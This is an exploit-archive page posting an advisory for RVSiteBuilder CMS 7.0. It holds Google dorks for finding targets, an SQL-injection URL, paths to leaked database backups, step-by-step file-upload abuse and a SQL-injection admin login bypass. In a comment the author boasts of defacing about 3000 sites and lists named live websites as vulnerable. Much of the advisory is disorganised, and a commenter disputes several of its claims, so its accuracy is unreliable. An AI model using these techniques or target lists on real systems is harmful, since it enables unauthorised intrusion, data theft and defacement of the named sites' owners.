what you don't know can hurt you

RVSiteBuilder RVGlobalSoft CMS 7.0 Bypass / Disclosure / SQL Injection

RVSiteBuilder RVGlobalSoft CMS 7.0 Bypass / Disclosure / SQL Injection
Posted Feb 14, 2019
Authored by KingSkrupellos

RVSiteBuilder RVGlobalSoft CMS version 7.0 suffers from bypass, database disclosure, file download, path disclosure, remote file upload, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection, info disclosure, file upload
MD5 | 3c019473a8382ff8cf5b15499f6ea3ab

RVSiteBuilder RVGlobalSoft CMS 7.0 Bypass / Disclosure / SQL Injection

Change Mirror Download
#################################################################################################

# Exploit Title : RVSiteBuilder RVGlobalSoft CMS 7.0 Multiple Vulnerabilities

Vulnerabilities are =>
******************
SQL Injection / File Upload / Authentication Bypass / Database Disclosure

# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Team
# Date : 14/02/2019
# Vendor Homepages : rvsitebuilder.com ~ rvglobalsoft.com ~ ckeditor.com
+ dynarch.com/jscal/ ~ jquery.com ~ docs.s9y.org ~ seagullproject.org ~ seagullsystems.com
# Social Media Link : facebook.com/Rvglobalsoft/ ~ facebook.com/RVsitebuilder-331466346876534/
+ twitter.com/rvsitebuilder ~ twitter.com/rvglobalsoft_
# Version : 7.0 and all previous versions.
# Google Dork : inurl:''/rvsindex.php/''
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Types : CWE-209 [ Information Exposure Through an Error Message ]
+ CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
+ CWE-264 [ Permissions, Privileges, and Access Controls ]
+ CWE-200 [ Information Exposure ]
+ CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
+ CWE-592 [ Authentication Bypass Issues ]
+ CWE-23 [ Relative Path Traversal ]
+ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
+ CWE-36 [ Absolute Path Traversal ]
+ CWE-538 [ File and Directory Information Exposure ]
+ CWE-548 [ Information Exposure Through Directory Listing ]
# CxSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018060101

#################################################################################################

# RVSiteBuilder RVGlobalSoft CMS High-Performance 7.0 Hosting Provider Serious Multiple Vulnerabilities
*********************************************************************************************

# Vulnerabilities and Exploits includes =>
************************************

1) Full Path Disclosure Vulnerability
2) SQL Injection Vulnerability
3) Arbitrary File Upload Vulnerability
4) Arbitrary File Download Database Backup .sql Vulnerability
5) What You See Is What You Get [ WYSIWYG ] FCKeditor Exploiter File Upload
6) Blog Administration Control Panel Authentication Bypass Vulnerability
7) Directory Traversal Vulnerability and Information Exposure Through Directory Listing
8) Information Exposure Through an Error Message
9) Permissions, Privileges, and Access Controls

#################################################################################################

# Description : RVglobalsoft is the leading software solutions for hosting provider.
***********************************************************************

# Google Dork 1 : inurl:''/rvsindex.php/''

# Google Dork 2 : inurl:''/rvsindex.php?/user/login''

# Google Dork 3 : inurl:''/rvsindex.php/user/register''

# Google Dork 4 : Index of /js Parent Directory SGL.js SGL/ SglFckconfig.js TreeMenu.js datetimepicker.js

#################################################################################################

# RevSiteBuilder Full Path Disclosure Vulnerability and PHP Warnings and Errors [ SQL Injection ] =>
*****************************************************************************************

TARGET/blog/rvsindex.php?/sitebuilder/action/list/list.php=[SQL Injection]

FOR CPANEL =>

pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi

FOR DURECTADMUN =>

pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi

#Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to
open stream: No such file or directory in /home/DOMAINADDRESS
/public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264

Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be compatible with
SGL_OutputRendererStrategy::initEngine() in /opt/cpanel/ea-php56/root/usr
/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89

Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible with
SGL_OutputRendererStrategy::render($view) in /opt/cpanel/ea-php56/root/usr
/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89

Strict Standards: Non-static method SGL_FrontController::isGoToClearCached()
should not be called statically in /opt/cpanel/ea-php56/root/usr/share/pear
/RVSeagullMod/lib/SGL/FrontController.php on line 257

Strict Standards: Declaration of SGL_MDB2::query() should be compatible with
MDB2_Driver_Common::query($query, $types = NULL, $result_class =
true, $result_wrap_class = true) in /home/koleksim/.rvsitebuilder/websitepublish
/3686a6380b5f3a8986f5ef385ce208f5/var/cachedLibs.php on line 82

Deprecated: Non-static method SGL_Task_SetupPaths::hostnameToFilename()
should not be called statically, assuming $this from incompatible context in
/opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/Config.php on line 60

Warning: Include path '/usr/lib/php' not exists in /home/DOMAINADDRESS
/public_html/rvscommonfunc.php on line 174
Please contact your host provider ssh as root to server and run.

Fatal error: Class 'SGL_FrontController' not found in /home/DOMAINADDRESS/public_html/rvsindex.php on line 20

####################################################################################################

PATH => TARGET/ComponentAndUserFramework.php

Please edit /home2/DOMAINADDRESS/public_html/php.ini
change include_path to
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54
/usr/share/pear:/usr/local/lib/php"

# PATH for View Homepage => TARGET/rvsindex.php

####################################################################################################

# RevSiteBuilder Admin Login Control Panel Authentication Bypass =>
**************************************************************

TARGET/admin or this is the Admin Panel way =>

/rvsindex.php?/user/login/

# PATH Admin Panel Login WordPress =>

TARGET/wp-login.php?redirect_to=http%3A%2F%2FDOMAINADDRESS%2F%2Fwp-admin%2F&reauth=1

# PATH Admin Panel Login Joomla =>

TARGET/administrator

# PATH Admin Panel Login osCommerce =>

TARGET/admin

# PATH Admin Panel Login OpenCart =>

TARGET/admin

Note : Some RVSiteBuilder websites uses wordpress and joomla
but all files belongs to revsitebuilder and rvglobalsoft software.
It is totally weird vulnerability.

They have path like TARGET/blogweb or TARGET/osc

But some sites gives this error. Sometimes it asks for username and password.

Please contact your provider edit file php.ini
change include_path to
include_path = ".:/usr/lib/php:/usr/local/lib/php"
save file and restart apache

####################################################################################################

# PATH for Uploaded Documents =>

TARGET/documents/

####################################################################################################

# PATH for JS JQuery-Ui Demos and Documents [ View Original Sources ] => T

TARGET/js/jquery-ui/demos/ and TARGET/js/jquery-ui/docs/

# You can view => Interactions - Widgets ~ Effects ~ About jQuery UI ~ Theming - View Sources

####################################################################################################

# PATH for JQuery Tests Version => TARGET/js/jquery-ui/tests/

####################################################################################################

# PATH for Themes Codes => TARGET/js/jquery-ui/themes/base/ and TARGET/js/themes/

####################################################################################################

# PATH jscalendar-1.0 "It is happening again" => TARGET/js/jscalendar/ => The Coolest DHTML Calendar - Online Demo

####################################################################################################

# PATH Changelog Last Changes => TARGET/js/scriptaculous/CHANGELOG

####################################################################################################

# PATH Learn Version => TARGET/js/scriptaculous/VERSION

####################################################################################################

# PATH for Optimizer => TARGET/optimizer.php

Please edit /home2/DOMAIN/public_html/php.ini
change include_path to
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"

####################################################################################################

# Other Paths that gives same error =>

#TARGET/rvsMasterCompoDB.php
#TARGET/rvsStaticWeb.php
#TARGET/rvscommonfunc.php
#TARGET/rvssetup.php

Please edit /home2/DOMAIN/public_html/php.ini
change include_path to
include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"

####################################################################################################

#QuickForm tutorial example - *Enter your name:

#/scripts/rvslib/Pear/quickFormTest.php
#/themes/default/default/testForms.html

####################################################################################################

#{if:adminApprove} {adminApprove}
#/themes/rvtheme/authweb/authPage.html

####################################################################################################

#{foreach:aFaqData,key,aValue} {if:aValue.category_name}
#/themes/rvtheme/faqweb/viewFaqWeb.html

###################################################################################################

#{if:forumsInstall} - Search for forums
#TARGET/themes/rvtheme/forums/blocksearch.html

####################################################################################################

# Testing forms
# /themes/default/testForms.php

#################################################################################################

# RevSiteBuilder RVGlobalSoft Open Redirection Vulnerability

# TARGET/login => It automatically redirects to this URL Link here => /rvsindex.php?/user/login/action/login

# Open Redirection Page /rvsindex.php?/user/login/redir/ANY-DOMAIN-ADRESS

#################################################################################################

# {translate(pageTitle)} Contactus
# /themes/rvtheme/main/contactMail.html

#################################################################################################

#{translate(#Please enter your name and e-mail address and select the newsletters that you want to subscribe.#)}
#/themes/rvtheme/newsletter/authorize.html
#/themes/rvtheme/newsletter/list.html
#/themes/rvtheme/newsletter/uikit_list.html

#################################################################################################

#RVTheme Admin Area and Users useable Login Paths =>

#/themes/rvtheme/user/account.html
#/themes/rvtheme/user/accountSummary.html
#/themes/rvtheme/user/blockLogin.html
#/themes/rvtheme/user/blockLogout.html
#/themes/rvtheme/user/horizontalBlockLogin.html
#/themes/rvtheme/user/loginForgot.html
#/themes/rvtheme/user/prefUserEdit.html
#/themes/rvtheme/user/profile.html
#/themes/rvtheme/user/uikit_login.html
#/themes/rvtheme/user/uikit_loginForgot.html
#/themes/rvtheme/user/uikit_prefUserEdit.html
#/themes/rvtheme/user/uikit_userAddUseCompoDB.html
#/themes/rvtheme/user/uikit_userPasswordEdit.html
#/themes/rvtheme/user/userAdd.html
#/themes/rvtheme/user/userAddUseCompoDB.html
#/themes/rvtheme/user/userPasswordEdit.html
#/themes/rvtheme/user/verticalBlockLogin.html
#/themes/rvtheme_admin/articleweb/admin_articleEdit.html
#/themes/rvtheme_admin/articleweb/admin_articleManager.html
#/themes/rvtheme_admin/articleweb/admin_articleTypeEdit.html
#/themes/rvtheme_admin/articleweb/admin_articleTypeManager.html
#/themes/rvtheme_admin/faqweb/admin_faqCategoryEdit.html
#/themes/rvtheme_admin/faqweb/admin_faqWebEdit.html
#/themes/rvtheme_admin/faqweb/admin_faqWebManager.html
#/themes/rvtheme_admin/css/

#####################################################################################################

#Learn Version of the RVSiteBuilder and RVGlobalSoft => TARGET/version.txt

#####################################################################################################

#Flash Player Version Detection => TARGET/Scripts/AC_RunActiveContent.js

#####################################################################################################

Getting started with Seagull Project => [ Seagull PHP Framework - (c) Seagull Systems 2003-2007 ]

/rvsindex.php?/default/masterLayout/layout-navtop-3col.css/

#####################################################################################################

# RevSiteBuilder SQL Injection Vulnerability =>
*****************************************

#Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be
compatible with SGL_OutputRendererStrategy::initEngine() in /usr/local
/lib/php/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89

#Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible
with SGL_OutputRendererStrategy::render($view) in /usr/local/lib/php
/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89

#Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to
open stream: No such file or directory in /home/DOMAINADDRESS
/public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264

#################################################################################################

# What You See Is What You Get [ WYSIWYG ] Exploiter =>
*******************************************************

# WYSIWYG FCKeditor Arbitrary File Upload Vulnerability and Exploit

# Exploit => ..../wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html

# Example Site => /images/....

# Allowed File Extensions => .txt .png .gif .jpg .xml

# Sometimes Wysiwyg Editor Gives this error when trying upload a file to the server

Please contact your host provider ssh as root to server and run.

For cpanel
pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi

For directadmin
pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi

Tutorial '' How to download RVsiteBuilder package file manually ? ''

For cPanel
--------------------

SSH to your cPanel server as root and run command

cd /usr/local/cpanel/whostmgr/docroot/cgi/

rm -rf /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/

rm -f rvsitebuilderinstaller.tar

wget http://download.rvglobalsoft.com/rvsitebuilderinstaller.tar

tar -xvf rvsitebuilderinstaller.tar

rm -f rvsitebuilderinstaller.tar

mkdir /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages

cd /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages

wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar

tar -xvf scriptdownloadpackage.tar

/usr/local/cpanel/3rdparty/bin/php scriptdownloadpackage.php

Once complete download file manually, please follow the instruction in this link. https://www.rvsitebuilder.com/installation/

--------------------

For DirectAdmin

--------------------

SSH to your cPanel server as root and run command

cd /usr/local/rvglobalsoft/rvsitebuilderinstaller/packages

wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar

tar -xvf scriptdownloadpackage.tar

php scriptdownloadpackage.php

Once complete download file manually, please follow the instruction in this link. https://www.rvsitebuilder.com/installation/

Reference => rvglobalsoft.com/knowledgebase/article/148/how-to-download-rvsitebuilder-package-file-manually/

Reference => rvskin.com/rvlogin/rvloginssh

##################################################################################################

# RevSiteBuilder Arbitrary File Database DB Backup .sql Download Vulnerability

# TARGET/rvsDbBackup.sql => OR download and view SQL Database Backup Files => TARGET/rvsUtf8Backup/rvsDbBackup.sql

# View RevSiteBuilder Page Data Backup => TARGET/rvsUtf8Backup/rvsPageData.sql

# Example Site DB Backup View => archive.is/Demkr

###################################################################################################

1) Register yourself to the site

TARGET/rvsindex.php?/user/register/

It says => You have successfully been registered. Please check your email for confirmation of your password.

Note : Confirm your registration in order to proceed.
Sometimes RVSiteBuilder and RVGlobalsoft gives you a new password or you choose your password while registration.
Pay attention : When you register choose your nickname carefully because it is important.

It says => Activation is successfully. Please login.

2) Login to the User Interface =>

TARGET/rvsindex.php?/user/login/action/login

3) You can use Account - User Preference - User Password Change Area

/rvsindex.php?/user/account/action/viewProfile/
/rvsindex.php?/user/account/
/rvsindex.php?/user/userpreference/
/rvsindex.php?/user/userpassword/action/edit/

4) Go to your Profile like this =>

TARGET/rvsindex.php?/user/account/action/viewProfile/

Edit these Values

Choose Image Upload => Allowed File Extensions ( jpg,gif,bmp,png,txt,html)

It says => Your profile details have been successfully updated

PATH : /themes/rvtheme/images/YOURNUCKNAME.

Note : Your chosen nickname is important while registration. Upload your html or txt file but do not put like this .yournickname.html

Just . [ dot ] is important here. You will see your index on that site.

#################################################################################################

# Serendipity RevSiteBuilder Blog Administration

# /blogweb/serendipity_admin.php

# Username : '=''or'
# Password : '=''or'

# You can use for both of them as '' admin '' '' admin ''

# /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect

# /blogweb/serendipity_admin_image_selector.php?serendipity[htmltarget]=img_icon&serendipity[filename_only]=true

# /blogweb/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect

# /blogweb/serendipity_admin.php?serendipity[adminModule]=personal

# /blogweb/uploads/yourfilename.rar

# Solution for Serendipity Blog Administration

# To mitigate this issue please upgrade at least to version 2.0.2:

# Download Link : https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip

# Please note that a newer version might already be available.

#################################################################################################

How to Install RVsitebuilder for Hosting Provider [ Bugs Fixation ] Check every folder and limit with .htaccess

cPanel
ssh to your server as root and install plugin 'RVglobalsoft manager' by run following shell command:
cd /usr/src; rm -fv rvsitebuilderinstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderinstall.sh; chmod +x rvsitebuilderinstall.sh; ./rvsitebuilderinstall.sh
Login to WHM as root. Go to WHM > Plugins > and run RVglobalsoft manager then follow simple install process.
Configure plugin for your panel. It's all done! RVsitebuilder is ready to use for all your users.

DirectAdmin
ssh to your server as "root" and install plugin 'RVglobalsoft manager' by run following shell command:
cd /usr/src; rm -fv rvsitebuilderdainstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderdainstall.sh; chmod +x rvsitebuilderdainstall.sh; ./rvsitebuilderdainstall.sh
For DirectAdmin panel with PHP version 5.5 only (If your panel is lower version of PHP, skip to step 3)
2.1 Run the following command to make RVsitebuilder compatible with PHP 5.5:
perl /usr/local/directadmin/plugins/rvsitebuilderinstaller/admin/installphpda.pl
2.2 Run the following command to make RVseagullmod compatible with PHP 5.5:
perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi --force=rvseagullmod
Open file 'directadmin.conf' that located in: usr/local/directadmin/conf/directadmin.conf and change the value of 'numservers' from 5 to 15
Go to Directadmin > Admin level > and run 'RVsitebuilder Admin' then follow simple install process.
Login to DirectAdmin as "admin" and Configure plugin on your panel.
RVsitebuilder in DirectAdmin plugins cannot configure hosting plans but
you can set plans in user level by RVsitebuilder Admin
Go to Directadmin > Admin level > open RVsitebuilder Admin and configure in 'User Control List' or 'Reseller Control List.'

#################################################################################################

RVSiteBuilder Last Changes and Bugs Fixation Reports [ Changelog ] => rvsitebuilder.com/changelog/

RVSiteBuilder Installation => rvsitebuilder.com/installation/

RVSiteBuilder and RVGlobalSoft Tutorials =>

rvsitebuilder.com/tutorials/ ~ rvglobalsoft.com/installation/ ~ documentation.cpanel.net/display/68Docs/Installation+Guide

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm Digital Security Team

#################################################################################################

Comments (2)

RSS Feed Subscribe to this comment feed
osvdb

This advisory is absolutely horrible. It's not very clear, and several of the issues pointed out don't appear to be vulnerabilities at all.

Comment by osvdb
2019-02-19 21:43:24 UTC | Permalink | Reply
kingskrupellos

Dear @osvdb ;

No - It is wonderful topic. Maybe you didn't understand how to do that.
Because I have hacked many sites [ approximately ] 3000 websites only with this exploit.
You believe or don't believe. This is the reality.
Do not make some nonsense comments under my files.
For example => Ask - if you don't understand it how to exploit it.

For Example => Zone-H Defacement Archive [ Year 2015 ]=>

Proof of Concept ;

zone-h.org/mirror/id/23722358
zone-h.org/mirror/id/23722290
zone-h.org/mirror/id/23722507
zone-h.org/mirror/id/23722497
zone-h.org/mirror/id/23722488
zone-h.org/mirror/id/23722489
zone-h.org/mirror/id/23722506
zone-h.org/mirror/id/23722481
zone-h.org/mirror/id/23722482
zone-h.org/mirror/id/23722486
zone-h.org/mirror/id/23722467
zone-h.org/mirror/id/23722479
zone-h.org/mirror/id/23722456
zone-h.org/mirror/id/23722480
zone-h.org/mirror/id/23722442
zone-h.org/mirror/id/23722128
zone-h.org/mirror/id/23722150
zone-h.org/mirror/id/23722155
zone-h.org/mirror/id/23722230
zone-h.org/mirror/id/23722230
zone-h.org/mirror/id/23722231
zone-h.org/mirror/id/23722232
zone-h.org/mirror/id/23722616
zone-h.org/mirror/id/23722377
zone-h.org/mirror/id/23722355
zone-h.org/mirror/id/23722359

Mostly Vulnerable Area for this Vulnerability/Exploit =>

##################################################################################################

# RevSiteBuilder Arbitrary File Database DB Backup .sql Download Vulnerability

# TARGET/rvsDbBackup.sql => OR download and view SQL Database Backup Files => TARGET/rvsUtf8Backup/rvsDbBackup.sql

# View RevSiteBuilder Page Data Backup => TARGET/rvsUtf8Backup/rvsPageData.sql

# Example Site DB Backup View => archive.is/Demkr

###################################################################################################

# WYSIWYG FCKeditor Arbitrary File Upload Vulnerability and Exploit

# Exploit => ..../wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html

1) Register yourself to the site

TARGET/rvsindex.php?/user/register/

It says => You have successfully been registered. Please check your email for confirmation of your password.

Note : Confirm your registration in order to proceed.
Sometimes RVSiteBuilder and RVGlobalsoft gives you a new password or you choose your password while registration.
Pay attention : When you register choose your nickname carefully because it is important.

It says => Activation is successfully. Please login.

2) Login to the User Interface =>

TARGET/rvsindex.php?/user/login/action/login

3) You can use Account - User Preference - User Password Change Area

/rvsindex.php?/user/account/action/viewProfile/
/rvsindex.php?/user/account/
/rvsindex.php?/user/userpreference/
/rvsindex.php?/user/userpassword/action/edit/

4) Go to your Profile like this =>

TARGET/rvsindex.php?/user/account/action/viewProfile/

Edit these Values

Choose Image Upload => Allowed File Extensions ( jpg,gif,bmp,png,txt,html)

It says => Your profile details have been successfully updated

PATH : /themes/rvtheme/images/YOURNUCKNAME.

Note : Your chosen nickname is important while registration. Upload your html or txt file but do not put like this .yournickname.html

Just . [ dot ] is important here. You will see your index on that site.

#################################################################################################

# Serendipity RevSiteBuilder Blog Administration

# /blogweb/serendipity_admin.php

# Username : '=''or'
# Password : '=''or'

# You can use for both of them as '' admin '' '' admin ''

# /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect

# /blogweb/serendipity_admin_image_selector.php?serendipity[htmltarget]=img_icon&serendipity[filename_only]=true

# /blogweb/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect

# /blogweb/serendipity_admin.php?serendipity[adminModule]=personal

# /blogweb/uploads/yourfilename.rar

# Solution for Serendipity Blog Administration

# To mitigate this issue please upgrade at least to version 2.0.2:

# Download Link : github.com/s9y/Serendipity/rel…

# Please note that a newer version might already be available.

#################################################################################################

# VULNERABLE WEBSITES =>

promotionalsinc.com/wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html

freezerman.co.uk/wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html

voicesinharmony.ca/wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html

cochisedefensivepistolmatch.com/wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html

dmoment.com.my/wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html

norrisbattalion.org/wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html

wildwoodcyclery.com/wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html

########## THE END #############

Comment by kingskrupellos
2019-02-21 00:34:37 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

June 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    1 Files
  • 2
    Jun 2nd
    2 Files
  • 3
    Jun 3rd
    19 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    15 Files
  • 6
    Jun 6th
    12 Files
  • 7
    Jun 7th
    11 Files
  • 8
    Jun 8th
    1 Files
  • 9
    Jun 9th
    1 Files
  • 10
    Jun 10th
    15 Files
  • 11
    Jun 11th
    15 Files
  • 12
    Jun 12th
    15 Files
  • 13
    Jun 13th
    8 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    2 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    18 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    22 Files
  • 20
    Jun 20th
    15 Files
  • 21
    Jun 21st
    12 Files
  • 22
    Jun 22nd
    2 Files
  • 23
    Jun 23rd
    1 Files
  • 24
    Jun 24th
    9 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close